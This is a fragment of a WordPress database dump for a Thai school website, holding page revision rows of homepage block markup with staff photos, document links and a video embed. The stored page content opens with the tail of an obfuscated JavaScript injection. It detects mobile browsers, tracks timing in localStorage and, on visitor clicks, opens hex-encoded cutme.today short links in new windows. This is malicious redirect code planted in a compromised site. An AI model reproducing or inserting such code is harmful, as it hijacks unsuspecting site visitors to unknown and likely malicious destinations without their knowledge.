)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:55:43','2025-07-15 07:55:43','',19,'http://watprato.ssk.in.th/?p=691',0,'revision','',0),
(693,1,'2025-07-15 14:58:03','2025-07-15 07:58:03','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 